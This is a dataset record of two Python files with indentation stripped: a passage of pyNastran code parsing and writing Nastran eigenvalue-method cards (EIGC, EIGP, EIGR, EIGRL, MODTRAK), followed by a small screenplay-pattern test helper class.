self.epsilon = epsilon
#Number of eigenvalues and/or eigenvectors desired. See Remark
#3. (Integer > 0 or blank; No default)
self.neigenvalues = neigenvalues
# CLAN
if mblkszs is None:
mblkszs = []
if iblkszs is None:
iblkszs = []
if ksteps is None:
ksteps = []
if NJIs is None:
NJIs = []
self.mblkszs = mblkszs
self.iblkszs = iblkszs
self.ksteps = ksteps
self.NJIs = NJIs
# HESS
if alphaBjs is None:
alphaBjs = []
if omegaBjs is None:
omegaBjs = []
self.alphaBjs = alphaBjs
self.omegaBjs = omegaBjs
if LJs is None:
LJs = []
self.LJs = LJs
if NEJs is None:
NEJs = []
self.NEJs = NEJs
if NDJs is None:
NDJs = []
self.NDJs = NDJs
if alphaAjs is None:
alphaAjs = []
if omegaAjs is None:
omegaAjs = []
self.alphaAjs = alphaAjs
self.omegaAjs = omegaAjs
#----------
# ISRR
self.shift_r1 = shift_r1
self.shift_i1 = shift_i1
self.isrr_flag = isrr_flag
self.nd1 = nd1
def validate(self):
assert self.norm in ['MAX', 'POINT'], 'norm=%r' % self.norm
nalpha_a = len(self.alphaAjs)
assert nalpha_a == len(self.omegaAjs), 'alphaAjs=%s omegaAj=%s' % (self.alphaAjs, self.omegaAjs)
if self.method in ['HESS', 'INV']:
assert nalpha_a == len(self.alphaBjs), 'alphaAjs=%s alphaBj=%s' % (self.alphaAjs, self.alphaBjs)
#assert nalpha_a == len(self.omegaBjs), 'alphaAjs=%s omegaBjs=%s' % (self.alphaAjs, self.omegaBjs)
assert nalpha_a == len(self.LJs), 'alphaAjs=%s LJs=%s' % (self.alphaAjs, self.LJs)
assert nalpha_a == len(self.NEJs), 'alphaAjs=%s NEJs=%s' % (self.alphaAjs, self.NEJs)
assert nalpha_a == len(self.NDJs), 'alphaAjs=%s NDJs=%s' % (self.alphaAjs, self.NDJs)
elif self.method == 'CLAN':
if nalpha_a == len(self.alphaBjs):
assert nalpha_a == len(self.alphaBjs), f'nalpha_a={nalpha_a} nalpha_b={len(self.alphaBjs)}'
assert nalpha_a == len(self.omegaBjs), f'nalpha_a={nalpha_a} nomega_b={len(self.omegaBjs)}'
assert nalpha_a == len(self.LJs)
assert nalpha_a == len(self.NEJs)
assert nalpha_a == len(self.NDJs)
else:
assert nalpha_a == len(self.omegaAjs)
assert nalpha_a == len(self.mblkszs), 'alphaAjs=%s mblkszs=%s' % (self.alphaAjs, self.mblkszs)
assert nalpha_a == len(self.iblkszs)
assert nalpha_a == len(self.ksteps)
assert nalpha_a == len(self.NJIs)
@classmethod
def add_card(cls, card, comment=''):
"""
Adds an EIGC card from ``BDF.add_card(...)``
Parameters
----------
card : BDFCard()
a BDFCard object
comment : str; default=''
a comment for the card
"""
sid = integer(card, 1, 'sid')
method = string(card, 2, 'method')
assert method in ['ARNO', 'INV', 'HESS', 'CLAN', 'ISRR', 'IRAM', 'DET'], (
'method=%s is not ARNO, INV, HESS, CLAN, ISRR, IRAM, DET' % method)
norm = string_or_blank(card, 3, 'norm', 'MAX')
if norm == 'POINT':
grid = integer(card, 4, 'G')
component = parse_components(card, 5, 'C')
else:
grid = blank(card, 4, 'G')
component = blank(card, 5, 'C')
epsilon = double_or_blank(card, 6, 'epsilon')
neigenvalues = integer_double_string_or_blank(card, 7, 'ND0/neigenvalues')
# ALPHAAJ OMEGAAJ ALPHABJ OMEGABJ LJ NEJ NDJ
fields = [interpret_value(field) for field in card[9:]]
#-------CLAN--------------
mblkszs = []
iblkszs = []
ksteps = []
NJIs = []
#-------CLAN--------------
#-------HESS--------------
alphaAjs = []
alphaBjs = []
omegaAjs = []
omegaBjs = []
mblkszs = []
iblkszs = []
ksteps = []
LJs = []
NEJs = []
NDJs = []
#-------HESS--------------
#-------ISRR--------------
shift_r1 = 0.0
shift_i1 = 0.0
isrr_flag = 0
nd1 = None
#-------ISRR--------------
nfields = len(fields)
nrows = nfields // 8
if nfields % 8 > 0:
nrows += 1
#if nrows == 0:
#msg = 'invalid row count=0; nfields=%s \ncard=%s\nfields=%s' % (
#nfields, card, fields)
#raise RuntimeError(msg)
if method == 'CLAN':
out = _load_clan(nrows, card)
(alphaAjs, omegaAjs, mblkszs, iblkszs, ksteps, NJIs,
alphaBjs, omegaBjs, LJs, NEJs, NDJs) = out
elif method in ['HESS', 'INV', 'DET']: # HESS, INV
alphaAjs, omegaAjs, alphaBjs, omegaBjs, LJs, NEJs, NDJs = _load_hess_inv(
nrows, method, card)
elif method == 'ISRR':
shift_r1, shift_i1, isrr_flag, nd1 = _load_isrr(nrows, card)
else:
raise RuntimeError(f'invalid EIGC method...method={method!r}')
#assert card.nfields() < 8, 'card = %s' % card
return EIGC(sid, method, grid, component, epsilon, neigenvalues,
norm, # common
mblkszs, iblkszs, ksteps, NJIs, # CLAN
alphaAjs, omegaAjs, alphaBjs, omegaBjs, LJs, NEJs, NDJs, # HESS/INV
shift_r1, shift_i1, isrr_flag, nd1, # ISRR
comment=comment)
def cross_reference(self, model: BDF) -> None:
pass
def raw_method(self):
list_fields = []
if self.method in ['HESS', 'INV', 'DET']:
for (alphaA, omegaA, alphaB, omegaB, Lj, NEj, NDj) in zip(
self.alphaAjs, self.omegaAjs, self.alphaBjs, self.omegaBjs,
self.LJs, self.NEJs, self.NDJs):
alphaA = set_blank_if_default(alphaA, 0.0)
omegaA = set_blank_if_default(omegaA, 0.0)
alphaB = set_blank_if_default(alphaB, 0.0)
omegaB = set_blank_if_default(omegaB, 0.0)
list_fields += [alphaA, omegaA, alphaB, omegaB, Lj, NEj, NDj, None]
elif self.method == 'CLAN':
nalpha_a = len(self.alphaAjs)
assert nalpha_a == len(self.omegaAjs)
if nalpha_a == len(self.alphaBjs): # pragma:no cover
assert nalpha_a == len(self.alphaBjs), f'nalpha_a={nalpha_a} nalpha_b={len(self.alphaBjs)}'
assert nalpha_a == len(self.omegaBjs), f'nalpha_a={nalpha_a} nomega_b={len(self.omegaBjs)}'
assert nalpha_a == len(self.LJs)
assert nalpha_a == len(self.NEJs)
assert nalpha_a == len(self.NDJs)
for (alphaA, omegaA, alphaB, omegaB, Lj, Nej, Ndj) in zip(
self.alphaAjs, self.omegaAjs,
self.alphaBjs, self.omegaBjs,
self.LJs, self.NEJs, self.NDJs):
#alphaA = set_blank_if_default(alphaA, 0.0)
#omegaA = set_blank_if_default(omegaA, 0.0)
#mblksz = set_blank_if_default(mblksz, 7)
#iblksz = set_blank_if_default(iblksz, 2)
#kstep = set_blank_if_default(kstep, 5)
list_fields += [alphaA, omegaA, alphaB, omegaB, Lj,
Nej, Ndj, None]
else:
assert nalpha_a == len(self.mblkszs)
assert nalpha_a == len(self.iblkszs)
assert nalpha_a == len(self.ksteps)
assert nalpha_a == len(self.NJIs)
for (alphaA, omegaA, mblksz, iblksz, kstep, Nj) in zip(
self.alphaAjs, self.omegaAjs, self.mblkszs, self.iblkszs,
self.ksteps, self.NJIs):
alphaA = set_blank_if_default(alphaA, 0.0)
omegaA = set_blank_if_default(omegaA, 0.0)
mblksz = set_blank_if_default(mblksz, 7)
iblksz = set_blank_if_default(iblksz, 2)
kstep = set_blank_if_default(kstep, 5)
list_fields += [alphaA, omegaA, mblksz, iblksz,
kstep, None, Nj, None]
elif self.method == 'ISRR':
assert self.shift_r1 is not None, self.get_stats()
assert len(self.shift_r1) > 0, self.get_stats()
for shift_r1i, shift_i1i, isrr_flagi, nd1i in zip(
self.shift_r1, self.shift_i1, self.isrr_flag, self.nd1):
list_fields += [shift_r1i, shift_i1i, None, None, None, isrr_flagi, nd1i, None]
else:
raise RuntimeError(f'invalid EIGC method. method={self.method!r} '
'expected=[HESS, INV, DET, CLAN, ISRR]')
return list_fields
def repr_method(self):
return self.raw_method()
def raw_fields(self):
list_fields = ['EIGC', self.sid, self.method, self.norm, self.G, self.C,
self.epsilon, self.neigenvalues, None]
list_fields += self.raw_method()
return list_fields
def repr_fields(self):
if self.epsilon is None:
epsilon = None
else:
epsilon = self.epsilon
list_fields = ['EIGC', self.sid, self.method, self.norm, self.G, self.C,
epsilon, self.neigenvalues, None]
list_fields += self.repr_method()
return list_fields
def write_card(self, size: int=8, is_double: bool=False) -> str:
card = self.repr_fields()
if size == 8:
return self.comment + print_card_8(card)
return self.comment + print_card_16(card)
class EIGP(Method):
"""
Defines poles that are used in complex eigenvalue extraction by the
Determinant method.
+------+-------+--------+--------+-------+--------+--------+-----+
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |
+======+=======+========+========+=======+========+========+=====+
| EIGP | SID | ALPHA1 | OMEGA1 | M1 | ALPHA2 | OMEGA2 | M2 |
+------+-------+--------+--------+-------+--------+--------+-----+
| EIGP | 15 | -5.2 | 0.0 | 2 | 6.3 | 5.5 | 3 |
+------+-------+--------+--------+-------+--------+--------+-----+
"""
type = 'EIGP'
@classmethod
def _init_from_empty(cls):
sid = 1
alpha1 = 1.
omega1 = 1.
m1 = 1.
alpha2 = 1.
omega2 = 1.
m2 = 1.
return EIGP(sid, alpha1, omega1, m1, alpha2, omega2, m2, comment='')
def __init__(self, sid, alpha1, omega1, m1, alpha2, omega2, m2, comment=''):
Method.__init__(self)
if comment:
self.comment = comment
#: Set identification number. (Unique Integer > 0)
self.sid = sid
#: Coordinates of point in complex plane. (Real)
self.alpha1 = alpha1
#: Coordinates of point in complex plane. (Real)
self.omega1 = omega1
#: Multiplicity of complex root at pole defined by point at ALPHAi
#: and OMEGAi
self.m1 = m1
#: Coordinates of point in complex plane. (Real)
self.alpha2 = alpha2
#: Coordinates of point in complex plane. (Real)
self.omega2 = omega2
#: Multiplicity of complex root at pole defined by point at ALPHAi
#: and OMEGAi
self.m2 = m2
@classmethod
def add_card(cls, card, comment=''):
"""
Adds an EIGPX card from ``BDF.add_card(...)``
Parameters
----------
card : BDFCard()
a BDFCard object
comment : str; default=''
a comment for the card
"""
sid = integer(card, 1, 'sid')
alpha1 = double(card, 2, 'alpha1')
omega1 = double(card, 3, 'omega1')
m1 = integer(card, 4, 'm1')
alpha2 = double(card, 5, 'alpha2')
omega2 = double(card, 6, 'omega2')
m2 = integer(card, 7, 'm2')
assert len(card) == 8, f'len(EIGP card) = {len(card):d}\ncard={card}'
return EIGP(sid, alpha1, omega1, m1, alpha2, omega2, m2, comment=comment)
def cross_reference(self, model: BDF) -> None:
pass
def raw_fields(self):
list_fields = ['EIGP', self.sid, self.alpha1, self.omega1, self.m1,
self.alpha2, self.omega2, self.m2]
return list_fields
def repr_fields(self):
return self.raw_fields()
def write_card(self, size: int=8, is_double: bool=False) -> str:
card = self.repr_fields()
if size == 8:
return self.comment + print_card_8(card)
return self.comment + print_card_16(card)
class EIGR(Method):
"""
Defines data needed to perform real eigenvalue analysis
# msc/nx
| EIGR | SID | METH| F1 | F2 | NE | ND | | |
| | NORM | G | C | | | | | |
# mystran
| EIGR | SID | METH| F1 | F2 | NE | ND | | CRIT |
| | NORM | G | C | | | | | |
"""
type = 'EIGR'
allowed_methods = [
'LAN', 'AHOU', # recommended
'INV', 'SINV', 'GIV', 'MGIV', 'HOU', 'MHOU', 'AGIV' # obsolete
]
@classmethod
def _init_from_empty(cls):
sid = 1
return EIGR(sid, method='LAN', f1=None, f2=None, ne=None, nd=None, crit=None,
norm='MASS', G=None, C=None, comment='')
def __init__(self, sid, method='LAN', f1=None, f2=None, ne=None, nd=None, crit=None,
norm='MASS', G=None, C=None, comment=''):
"""
Adds a EIGR card
Parameters
----------
sid : int
method id
method : str; default='LAN'
eigenvalue method
recommended: {LAN, AHOU}
obsolete : {INV, SINV, GIV, MGIV, HOU, MHOU, AGIV}
f1 / f2 : float; default=None
lower/upper bound eigenvalue
ne : int; default=None
estimate of number of roots (used for INV)
nd : int; default=None
desired number of roots
crit : float; default=None
orthogonality criterion
norm : str; default='MASS'
{MAX, MASS, AF, POINT}
G : int; default=None
node id for normalization; only for POINT
C : int; default=None
component for normalization (1-6); only for POINT
comment : str; default=''
a comment for the card
"""
Method.__init__(self)
if comment:
self.comment = comment
if G == 0:
G = None
if C == 0:
C = None
#: Set identification number. (Unique Integer > 0)
self.sid = sid
#: Method of eigenvalue extraction. (Character: 'INV' for inverse
#: power method or 'SINV' for enhanced inverse power method.)
self.method = method
#: Frequency range of interest
self.f1 = f1
self.f2 = f2
#: Estimate of number of roots in range (Required for
#: METHOD = 'INV'). Not used by 'SINV' method.
self.ne = ne
#: Desired number of roots (default=600 for SINV 3*ne for INV)
self.nd = nd
#: orthogonality criterion
self.crit = crit
#: Method for normalizing eigenvectors. ('MAX' or 'POINT';
#: Default='MAX')
self.norm = norm
#: Grid or scalar point identification number. Required only if
#: NORM='POINT'. (Integer>0)
self.G = G
#: Component number. Required only if NORM='POINT' and G is a
#: geometric grid point. (1<Integer<6)
self.C = C
if self.method not in self.allowed_methods:
msg = 'method=%s; allowed_methods=[%s]' % (
self.method, ', '.join(self.allowed_methods))
raise ValueError(msg)
assert norm in ['POINT', 'MASS', 'MAX']
@classmethod
def add_card(cls, card, comment=''):
"""
Adds an EIGR card from ``BDF.add_card(...)``
Parameters
----------
card : BDFCard()
a BDFCard object
comment : str; default=''
a comment for the card
"""
sid = integer(card, 1, 'sid')
method = string_or_blank(card, 2, 'method', 'LAN')
f1 = double_or_blank(card, 3, 'f1')
f2 = double_or_blank(card, 4, 'f2')
ne = integer_or_blank(card, 5, 'ne')
if method not in cls.allowed_methods:
msg = 'method=%s; allowed_methods=[%s]' % (
method, ', '.join(cls.allowed_methods))
raise ValueError(msg)
if method == 'SINV':
nd = integer_or_blank(card, 6, 'nd', 600)
elif method == 'INV':
ne = integer(card, 5, 'ne')
nd = integer_or_blank(card, 6, 'nd', 3 * ne)
elif method in ['GIV', 'MGIV', 'HOU', 'MHOU']:
nd = integer_or_blank(card, 6, 'nd', 0)
else:
nd = integer(card, 6, 'nd')
crit = double_or_blank(card, 8, 'crit')
norm = string_or_blank(card, 9, 'norm', 'MASS')
if norm == 'POINT':
G = integer(card, 10, 'G')
C = parse_components(card, 11, 'C')
else:
G = blank(card, 10, 'G')
C = blank(card, 11, 'C')
assert len(card) <= 12, f'len(EIGR card) = {len(card):d}\ncard={card}'
return EIGR(sid, method, f1, f2, ne, nd,
crit=crit, norm=norm, G=G, C=C, comment=comment)
def cross_reference(self, model: BDF) -> None:
pass
def raw_fields(self):
list_fields = ['EIGR', self.sid, self.method, self.f1, self.f2, self.ne,
self.nd, None, None, self.norm, self.G, self.C]
return list_fields
def repr_fields(self):
method = set_blank_if_default(self.method, 'LAN')
norm = set_blank_if_default(self.norm, 'MASS')
list_fields = ['EIGR', self.sid, method, self.f1, self.f2, self.ne,
self.nd, None, None, norm, self.G, self.C]
return list_fields
def write_card(self, size: int=8, is_double: bool=False) -> str:
card = self.repr_fields()
if size == 8:
return self.comment + print_card_8(card)
return self.comment + print_card_16(card)
class EIGRL(Method):
"""
Defines data needed to perform real eigenvalue (vibration or buckling)
analysis with the Lanczos method
+-------+-----+----+----+----+--------+--------+--------+------+
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |
+=======+=====+====+====+====+========+========+========+======+
| EIGRL | SID | V1 | V2 | ND | MSGLVL | MAXSET | SHFSCL | NORM |
+-------+-----+----+----+----+--------+--------+--------+------+
| option_1 = value_1 option_2 = value_2, etc. |
+--------------------------------------------------------------+
"""
type = 'EIGRL'
@classmethod
def _init_from_empty(cls):
sid = 1
return EIGRL(sid, v1=None, v2=None, nd=None, msglvl=0, maxset=None,
shfscl=None, norm=None, options=None, values=None, comment='')
def __init__(self, sid, v1=None, v2=None, nd=None, msglvl=0, maxset=None, shfscl=None,
norm=None, options=None, values=None, comment=''):
"""
Adds an EIGRL card
Parameters
----------
sid : int
method id
v1 : float; default=None
lower bound eigenvalue
v2 : float; default=None
upper bound eigenvalue
nd : int
number of roots
msglvl : int; default=0
debug level; 0-4
maxset : int; default=None
Number of vectors in block or set
shfscl : float; default=None
estimate of first flexible mode natural frequency
norm : str; default=None
{MAX, MASS, AF}
options : ???; default=None -> []
???
values : ???; default=None -> []
???
comment : str; default=''
a comment for the card
"""
Method.__init__(self)
if comment:
self.comment = comment
if options is None:
options = []
if values is None:
values = []
#: Set identification number. (Unique Integer > 0)
self.sid = sid
#: For vibration analysis: frequency range of interest. For
#: buckling analysis: eigenvalue range of interest. See Remark 4.
#: (Real or blank; -5.0E16 <= V1 < V2 <= 5.0E16)
self.v1 = v1
self.v2 = v2
#: Number of roots desired
self.nd = nd
#: Diagnostic level. (0 < Integer < 4; Default = 0)
self.msglvl = msglvl
#: Number of vectors in block or set. Default is machine dependent
self.maxset = maxset
#: Estimate of the first flexible mode natural frequency
#: (Real or blank)
self.shfscl = shfscl
#: Method for normalizing eigenvectors (Character: 'MASS' or 'MAX')
self.norm = norm
self.options = options
self.values = values
def validate(self):
assert self.norm in [None, 'MAX', 'MASS', 'AF'], 'norm=%r' % self.norm
assert self.msglvl in [0, 1, 2, 3, 4], 'msglvl=%r' % self.msglvl
if len(self.options) != len(self.values):
raise RuntimeError('len(options) != len(values); noptions=%s nvalues=%s\n'
'options=%s values=%s' % (len(self.options), len(self.values),
self.options, self.values))
for option, value in zip(self.options, self.values):
if option == 'NORM':
assert value in ['MAX', ], 'option=%r value=%r' % (option, value)
elif option == 'ALPH':
# float
pass
elif option == 'NUMS':
# integer
pass
else:
raise NotImplementedError('option=%r value=%r' % (option, value))
@classmethod
def add_card(cls, card, comment=''):
"""
Adds an EIGRL card from ``BDF.add_card(...)``
Parameters
----------
card : BDFCard()
a BDFCard object
comment : str; default=''
a comment for the card
"""
sid = integer(card, 1, 'sid')
v1 = double_or_blank(card, 2, 'v1')
v2 = double_or_blank(card, 3, 'v2')
nd = integer_or_blank(card, 4, 'nd')
msglvl = integer_or_blank(card, 5, 'msglvl', 0)
maxset = integer_or_blank(card, 6, 'maxset')
shfscl = double_or_blank(card, 7, 'shfscl')
norm = string_or_blank(card, 8, 'norm')
option_values = [interpret_value(field) for field in card[9:]]
options = []
values = []
for option_value in option_values:
try:
(option, value) = option_value.split('=')
except AttributeError:
msg = 'parsing EIGRL card incorrectly; option_values=%s\ncard=%s' % (
option_values, card)
raise RuntimeError(msg)
options.append(option)
values.append(value)
#: Method for normalizing eigenvectors
#if sol in [103, 115, 146]:
## normal modes,cyclic normal modes, flutter
#self.norm = string_or_blank(card, 8, 'norm', 'MASS')
#elif sol in [105, 110, 111, 116]:
## buckling, modal complex eigenvalues,
## modal frequency response,cyclic buckling
#self.norm = string_or_blank(card, 8, 'norm', 'MAX')
#else:
norm = string_or_blank(card, 8, 'norm')
#assert len(card) <= 9, f'len(EIGRL card) = {len(card):d}\ncard={card}'
assert len(card) <= 10, f'len(EIGRL card) = {len(card):d}\ncard={card}'
#msg = 'norm=%s sol=%s' % (self.norm, sol)
#assert self.norm in ['MASS', 'MAX'],msg
#assert len(card) < 9,'card = %s' % (card.fields(0))
return EIGRL(sid, v1, v2, nd, msglvl, maxset, shfscl, norm,
options, values, comment=comment)
def cross_reference(self, model: BDF) -> None:
pass
#if self.norm is None:
#if model.is_modal_solution():
#self.norm = 'MASS'
#elif model.is_buckling_solution():
#self.norm = 'MAX'
def raw_fields(self):
list_fields = ['EIGRL', self.sid, self.v1, self.v2, self.nd,
self.msglvl, self.maxset, self.shfscl, self.norm]
for (option, value) in zip(self.options, self.values):
list_fields += [option + '=' + str(value)]
return list_fields
def repr_fields(self):
msglvl = set_blank_if_default(self.msglvl, 0)
list_fields = ['EIGRL', self.sid, self.v1, self.v2, self.nd, msglvl,
self.maxset, self.shfscl, self.norm]
for (option, value) in zip(self.options, self.values):
list_fields += [option + '=' + str(value)]
return list_fields
def write_card(self, size: int=8, is_double: bool=False) -> str:
card = self.repr_fields()
if size == 8:
return self.comment + print_card_8(card)
return self.comment + print_card_16(card)
def _load_isrr(nrows, card):
"""loads the iterative Schur-Rayleigh-Ritz"""
shift_r1 = []
shift_i1 = []
isrr_flag = []
nd1 = []
for irow in range(nrows):
i = 9 + 8 * irow
shift_r1i = double_or_blank(card, i, 'SHIFT_R1', 0.0)
shift_i1i = double_or_blank(card, i + 1, 'SHIFT_I1', 0.0)
#2
#3
#4
isrr_flagi = integer_or_blank(card, i + 5, 'ISRR_FLAG', 0)
nd1i = integer(card, i + 6, 'ND1')
shift_r1.append(shift_r1i)
shift_i1.append(shift_i1i)
isrr_flag.append(isrr_flagi)
nd1.append(nd1i)
return shift_r1, shift_i1, isrr_flag, nd1
def _load_clan(nrows, card):
"""loads complex Lanczos"""
alphaAjs = []
omegaAjs = []
mblkszs = []
iblkszs = []
ksteps = []
NJIs = []
alphaBjs = []
omegaBjs = []
ljs = []
nejs = []
ndjs = []
is_nej = None
for irow in range(nrows):
#NDJ_default = None
i = 9 + 8 * irow
alphaAjs.append(
double_or_blank(card, i, 'alpha' + str(irow), 0.0))
omegaAjs.append(
double_or_blank(card, i + 1, 'omega' + str(irow), 0.0))
nej_blank = integer_or_blank(card, i + 6, 'NEJ_blank')
if nej_blank is not None and 0: # pragma: no cover
assert is_nej in [True, None], is_nej
is_nej = True
# ALPHAAJ OMEGAAJ ALPHABJ OMEGABJ LJ NEJ NDJ
assert isinstance(nej_blank, int), nej_blank
alpha_bj = double(card, i + 2, 'alpha_bj' + str(irow))
omega_bj = double(card, i + 3, 'omega_bj' + str(irow))
lj = double_or_blank(card, i + 4, 'LJ' + str(irow), 1.0)
nej = integer_or_blank(card, i + 5, 'NEJ' + str(irow))
ndj = integer(card, i + 6, 'NDJ' + str(irow))
alphaBjs.append(alpha_bj)
omegaBjs.append(omega_bj)
ljs.append(lj)
nejs.append(nej)
ndjs.append(ndj)
else:
assert is_nej in [False, None], is_nej
is_nej = False
# ALPHAAJ OMEGAAJ MBLKSZ IBLKSZ KSTEPS blank NJi
mblock_size = double_or_blank(card, i + 2, 'mblock' + str(irow), 7)
# iblkszs is an integer, but entered as a float...
iblock_size = double_or_blank(card, i + 3, 'iblksz' + str(irow), 2.0)
kstep = integer_or_blank(card, i + 4, 'kstep' + str(irow), 5)
nji = integer(card, i + 6, 'NJI' + str(irow))
mblkszs.append(mblock_size)
iblkszs.append(iblock_size)
ksteps.append(kstep)
NJIs.append(nji)
out = (
alphaAjs, omegaAjs, mblkszs, iblkszs, ksteps, NJIs,
alphaBjs, omegaBjs, ljs, nejs, ndjs,
)
return out
def _load_hess_inv(nrows, method, card):
"""loads inverse power"""
alpha_omega_default = None
LJ_default = None
if method == 'INV':
alpha_omega_default = 0.0
LJ_default = 1.0
alphaAjs = []
alphaBjs = []
omegaAjs = []
omegaBjs = []
#mblkszs = []
#iblkszs = []
#ksteps = []
LJs = []
NEJs = []
NDJs = []
for irow in range(nrows):
NEj = integer_or_blank(card, 9 + 7 * irow + 5, 'NE%s' % str(irow), 0)
NDJ_default = None
if method == 'INV':
NDJ_default = 3 * NEj
i = 9 + 8 * irow
alphaAjs.append(
double_or_blank(card, i, 'alphaA' + str(irow), alpha_omega_default))
omegaAjs.append(
double_or_blank(card, i + 1, 'omegaA' + str(irow), alpha_omega_default))
alphaBjs.append(
double_or_blank(card, i + 2, 'alphaB' + str(irow), alpha_omega_default))
omegaBjs.append(
double_or_blank(card, i + 3, 'omegaB' + str(irow), alpha_omega_default))
LJs.append(
double_or_blank(card, i + 4, 'LJ' + str(irow), LJ_default))
NEJs.append(NEj)
NDJs.append(integer_or_blank(card, i + 6, 'NDJ' + str(irow), NDJ_default))
return alphaAjs, omegaAjs, alphaBjs, omegaBjs, LJs, NEJs, NDJs
class MODTRAK(BaseCard):
"""
MODTRAK SID LOWRNG HIGHRNG MTFILTER
MODTRAK 100 1 26 0.80
"""
def __init__(self, sid, low_range, high_range, mt_filter, comment=''):
BaseCard.__init__(self)
self.sid = sid
self.low_range = low_range
self.high_range = high_range
self.mt_filter = mt_filter
@classmethod
def add_card(cls, card, comment=''):
sid = integer(card, 1, 'sid')
low_range = integer_or_blank(card, 2, 'low_range', 0)
high_range = integer(card, 3, 'high_range')
mt_filter = double_or_blank(card, 4, 'mt_filter', 0.9)
return MODTRAK(sid, low_range, high_range, mt_filter, comment=comment)
def raw_fields(self) -> List[Any]:
list_fields = ['MODTRAK', self.sid, self.low_range, self.high_range, self.mt_filter]
return list_fields
def write_card(self, size: int=8, is_double: bool=False) -> str:
fields = self.raw_fields()
#if size == 8:
return self.comment + print_card_8(fields)
#return self.comment + print_card_16(fields)
| 35.795047
| 110
| 0.516676
|
f6da5428789043e08eb9f1ce35cedf0b3fe38998
| 362
|
py
|
Python
|
screenplay/screenplay/condition.py
|
jack-skerrett-bluefruit/Python-ScreenPlay
|
045486bdf441fa3a7a6cde59e7b7e12a7d53fbed
|
[
"MIT"
] | null | null | null |
screenplay/screenplay/condition.py
|
jack-skerrett-bluefruit/Python-ScreenPlay
|
045486bdf441fa3a7a6cde59e7b7e12a7d53fbed
|
[
"MIT"
] | null | null | null |
screenplay/screenplay/condition.py
|
jack-skerrett-bluefruit/Python-ScreenPlay
|
045486bdf441fa3a7a6cde59e7b7e12a7d53fbed
|
[
"MIT"
] | null | null | null |
from .question import Question
from .matcher import Matcher
class Condition:
def __init__(self, question: Question, expected: Matcher):
self.question = question
self.expected = expected
def check_as(self, actor):
assert self.expected.matches(self.question.answered_by(actor)), self.expected.fail_message
see_that = Condition
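# A minimal usage sketch (hypothetical Question/Matcher subclasses, not part of this
# module), showing how see_that composes a question with a matcher for an actor:
#
#   class PageTitle(Question):
#       def answered_by(self, actor):
#           return actor.browser.title
#
#   class IsEqualTo(Matcher):
#       def __init__(self, expected):
#           self.expected = expected
#           self.fail_message = f"expected {expected!r}"
#       def matches(self, actual):
#           return actual == self.expected
#
#   see_that(PageTitle(), IsEqualTo("Welcome")).check_as(actor)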
| 24.133333
| 98
| 0.729282
|